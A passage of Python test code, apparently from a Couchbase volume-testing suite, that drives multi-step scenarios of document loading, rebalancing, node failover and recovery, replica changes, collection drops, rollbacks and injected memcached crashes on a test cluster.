num_reader_threads=self.new_num_reader_threads)
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(), msg="Rebalance failed")
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.servers[:self.nodes_in + self.nodes_init],
self.cluster.buckets, path=None)
nodes = self.cluster_util.get_nodes_in_cluster(self.cluster)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=nodes, buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 60 - 70M
This Step:
Create Random: 70 - 80M
Delete Random: 60 - 70M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 70-80M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 11: Failover a node and FullRecovery\
that node")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
self.sleep(60, "Waiting for full recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 70 - 80M
This Step:
Create Random: 80 - 90M
Delete Random: 70 - 80M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 80-90M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 12: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.sleep(60, "Waiting for delta recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.set_num_writer_and_reader_threads(
num_writer_threads="disk_io_optimized",
num_reader_threads="disk_io_optimized")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 80 - 90M
This Step:
Create Random: 90 - 100M
Delete Random: 80 - 90M
Update Random: 0 - 10M
Replica 1 - > 2
Final Docs = 30M (Random: 0-10M, 90-100M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 13: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
####################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 90 - 100M
This Step:
Create Random: 100 - 110M
Delete Random: 90 - 100M
Update Random: 0 - 10M
Replica 2 - > 1
Final Docs = 30M (Random: 0-10M, 100-110M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 14: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
#######################################################################
self.PrintStep("Step 15: Flush the bucket and \
start the entire process again")
self.loop += 1
if self.loop < self.iterations:
# Flush the bucket
result = self.bucket_util.flush_all_buckets(self.cluster)
self.assertTrue(result, "Flush bucket failed!")
self.sleep(600)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
else:
self.log.info("Volume Test Run Complete")
self.init_doc_params()
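# Read-heavy scenario: load items until the target DGM is reached, then run a read-only workload for the configured number of iterations.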
def ReadHeavyWorkload(self):
#######################################################################
self.key_prefix = "random_keys"
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.doc_ops = ["create"]
self.create_perc = 100
for bucket in self.cluster.buckets:
self.PrintStep("Step 1: Create %s items" % self.num_items)
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(validate_data=False)
dgm = self.get_bucket_dgm(bucket)
while self.dgm and dgm > self.dgm:
self.generate_docs(doc_ops=self.doc_ops)
dgm = self.get_bucket_dgm(bucket)
self.perform_load(validate_data=False)
self.doc_ops = ["read"]
self.read_perc = 100
self.generate_docs(doc_ops=self.doc_ops)
self.data_validation()
while self.loop <= self.iterations:
task = self.perform_load(wait_for_load=False, validate_data=False)
self.wait_for_doc_load_completion(task)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
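# Test scenario named after Couchbase ticket MB-43460: heavy sequential creates, a pass that drops alternate collections, then a delete-driven rollback.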
def MB_43460(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create")
self.perform_load(validate_data=False)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
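# Test scenario named after Couchbase ticket MB-42652: repeated update/create cycles to build fragmentation, followed by collection drops and re-creates.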
def MB_42652(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.key_type = self.input.param("key_type", "SimpleKey")
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 4:
exit(4)
'''
fragmentation at this time: 0, total data: 2X, stale: 0
'''
#######################################################################
'''
update: 0 - 1M * 10
Final Docs = 20M (0-20M)
'''
self.update_perc = 100
self.PrintStep("Step 5: Update the first set of %s percent (%s) items \
%s times" % (str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations:
self.PrintStep("Step 5.%s: Update the first set of %s percent (%s) \
items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update")
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 5:
exit(5)
'''
fragmentation at this time: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_prefix = "random_keys"
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.key_prefix = "random_keys"
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update",
update_start=self.start,
update_end=self.end*self.update_perc/100)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_items = self.final_items
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
self.sleep(random.randint(1, 4))
drop += 1
if drop % (total_collections/4) == 0:
self.sleep(60, "Sleep after dropping half collections...")
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.final_items = total_items
self.num_collections = self.num_collections - drop
if self.end_step == 13:
exit(13)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(10, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
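# Steady-state scenario on a fixed cluster: mixed CRUD cycles, reverse updates, rollbacks of each mutation type, collection drops and crash/recovery loops.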
def SteadyStateVolume(self):
check_dump_th = threading.Thread(target=self.check_dump)
check_dump_th.start()
self.loop = 1
self.PrintStep("Step 3: Create %s items and checkout fragmentation" % str(self.num_items))
self.create_perc = 100
self.generate_docs(doc_ops=["create"],
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
self.generate_docs(doc_ops=["create"],
create_start=self.end,
create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 2:
exit(2)
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
deletes: 0 - 10M
Final Docs = 0
'''
self.PrintStep("Step 4: Starting parallel cruds")
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.generate_docs()
self.perform_load(validate_data=True)
if self.end_step == 3:
exit(3)
'''
fragmentation at this time: 0
'''
#######################################################################
'''
|----READ----|----UPDATE----|----DELETE----|----CREATE----|
25% 25% 25% 25%
Reverse Update: 10M - 9M
Final Docs = 20M (0-20M)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 6: Reverse Update last set of %s percent (%s-%s) \
items %s times" % (str(self.update_perc), str(self.num_items-1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 6.%s: Reverse Update last set of %s percent \
(%s-%s) items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items+1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
start = -self.update_end + 1
end = -self.update_start
self.generate_docs(doc_ops=["update"],
update_start=start,
update_end=end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 6:
exit(6)
'''
fragmentation: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.start + self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=["update"],
update_start=self.start,
update_end=self.end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
'''
Delete Random: 0 - 10M
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
self.key_prefix = "random_keys"
self.delete_perc = 100
self.PrintStep("Step 9: Delete/Re-Create all %s random items" %
str(self.num_items))
self.generate_docs(doc_ops=["delete"],
delete_start=self.start,
delete_end=self.end)
self.perform_load(crash=False, validate_data=True)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.end)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
if self.end_step == 9:
exit(9)
#######################################################################
'''
Update: 0 - 1M
Final Docs = 30M (0-20M, 10M Random)
'''
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.PrintStep("Step 10: Update %s percent(%s) items %s times and \
crash during recovery" % (str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations and self.crashes:
self.PrintStep("Step 10.%s: Update %s percent(%s) items %s times \
and crash during recovery" % (str(_iter), str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(crash=True, validate_data=False)
_iter += 1
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=1200)
if self.end_step == 10:
exit(10)
#######################################################################
self.PrintStep("Step 11: Normal Rollback with creates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(self.final_items, mem_only_items,
doc_type="create")
if self.end_step == 11:
exit(11)
#######################################################################
self.PrintStep("Step 12: Normal Rollback with updates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="update")
if self.end_step == 12:
exit(12)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
#######################################################################
self.PrintStep("Step 15: Normal Rollback with expiry")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="expiry")
if self.end_step == 15:
exit(15)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
if self.crashes:
self.PrintStep("Step 16: Random crashes during CRUD-Expiry")
'''
Creates: 20M-50M
Final Docs = 60M (0-50M, 10M Random)
Updates: 0M-20M
Final Docs = 60M (0-50M, 10M Random)
Deletes: 0M-20M
Final Docs = 40M (20-50M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 200
self.expiry_perc = 200
self.generate_docs(doc_ops="create;update;delete;expiry",
delete_start=0,
delete_end=self.num_items*self.delete_perc/100,
expire_start=0,
expire_end=self.num_items*self.expiry_perc/100)
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 16:
exit(16)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.PrintStep("Step 17: Random crashes during CRUD-Expiry")
'''
Creates: 50M-80M
Final Docs = 90M (0-80M, 10M Random)
Updates: 0M-20M
Final Docs = 90M (0-80M, 10M Random)
Deletes: 0M-20M
Final Docs = 70M (20-90M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 150
self.expiry_perc = 150
self.generate_docs(doc_ops="create;update;delete;expiry")
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False,
"num_kills": 20})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 17:
exit(17)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(600, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
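# Long-running system test: continuous expiry/create/update load while cycling rebalances (paused or aborted), failovers, replica changes and repeated memcached crashes.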
def SystemTestMagma(self):
#######################################################################
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.crash_count = 0
self.stop_rebalance = self.input.param("pause_rebalance", False)
self.crashes = self.input.param("crashes", 20)
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.expiry_perc = 100
self.create_perc = 100
self.update_perc = 100
self.delete_perc = 100
self.key_prefix = "random"
self.doc_ops = self.input.param("doc_ops", ["expiry"])
self.generate_docs(doc_ops=self.doc_ops,
expire_start=0,
expire_end=self.num_items,
create_start=self.num_items,
create_end=self.num_items*2,
update_start=self.num_items*2,
update_end=self.num_items*3
)
self.perform_load(wait_for_load=False)
self.sleep(300)
while self.loop <= self.iterations:
###################################################################
self.PrintStep("Step 4: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 5: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 6: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 7: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 8: Failover a node and RebalanceOut that node \
with loading in parallel")
# Chose node to failover
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Failover Node
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Rebalance out failed over node
self.otpNodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[otpNode.id for otpNode in self.otpNodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(stop_if_loop=True),
msg="Rebalance failed")
# Maintain nodes availability
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 9: Failover a node and FullRecovery\
that node")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 10: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 12: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 13: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 14: Start the entire process again")
self.loop += 1
if self.loop < self.iterations:
self.sleep(10)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
